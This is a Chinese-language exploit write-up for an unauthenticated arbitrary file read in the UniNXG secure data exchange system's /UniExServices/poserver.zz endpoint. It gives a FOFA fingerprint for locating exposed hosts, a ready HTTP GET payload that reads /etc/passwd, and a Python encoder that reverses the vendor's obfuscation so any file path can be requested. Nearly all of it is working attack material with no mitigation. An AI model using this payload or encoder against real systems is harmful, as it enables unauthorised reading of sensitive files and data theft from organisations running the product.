L12-1联软安渡-UniNXG安全数据交换系统-任意文件读取
漏洞描述:
联软安渡 UniNXG 安全数据交换系统 /UniExServices/poserver.zz 接口任意文件读取漏洞,未经身份验证的攻击者可利用此漏洞构造加密的恶意请求读取系统内部敏感文件,造成数据泄露,导致系统处于极不安全的状态。
网站图片:
fofa语法:
web.icon=“928831999d8de4c41d271319631ab01b”
漏洞复现:
payload:
GET /UniExServices/poserver.zz?pgop=opendiskdoc&id=KmcgY3MtK3IpLSRfOXE9YmpkL2orbBdrKztnJCltInIrbDhyP24rOzhjPHI= HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Connection: close
效果图:
id处的密文为 file=/etc/passwd&filename=1&contenttype=text,可自行调整读取的文件
payload:
import base64
def encode_string(string):
bytes_ = bytearray(string, 'utf-8')
result = bytearray(len(bytes_))
for i in range(len(bytes_)):
if i % 2 != 0:
result[i] = bytes_[i] - 2
else:
result[i] = (bytes_[i] - 3) ^ 73
s = result.decode('utf-8')
encoded_string = base64.b64encode(s.encode('utf-8'))
return encoded_string.decode('utf-8')
def decode_string(encoded_string):
decoded_string = base64.b64decode(encoded_string)
decoded_string = decoded_string.decode('utf-8')
result = bytearray(len(decoded_string))
for i in range(len(decoded_string)):
if i % 2 != 0:
result[i] = ord(decoded_string[i]) + 2
else:
result[i] = (ord(decoded_string[i]) ^ 73) + 3
return result.decode('utf-8')
# 加密功能
def encrypt():
original_string = input("请输入要加密的字符串:")
encoded_string = encode_string(original_string)
print("加密后的字符串:", encoded_string)
# 解密功能
def decrypt():
encoded_string = input("请输入要解密的字符串:")
decoded_string = decode_string(encoded_string)
print("解密后的字符串:", decoded_string)
# 主程序
while True:
choice = input("请选择操作(1.加密 2.解密 3.退出):")
if choice == '1':
encrypt()
elif choice == '2':
decrypt()
elif choice == '3':
break
else:
print("无效的选择,请重新输入。")
读取/etc/passwd文件
效果图:
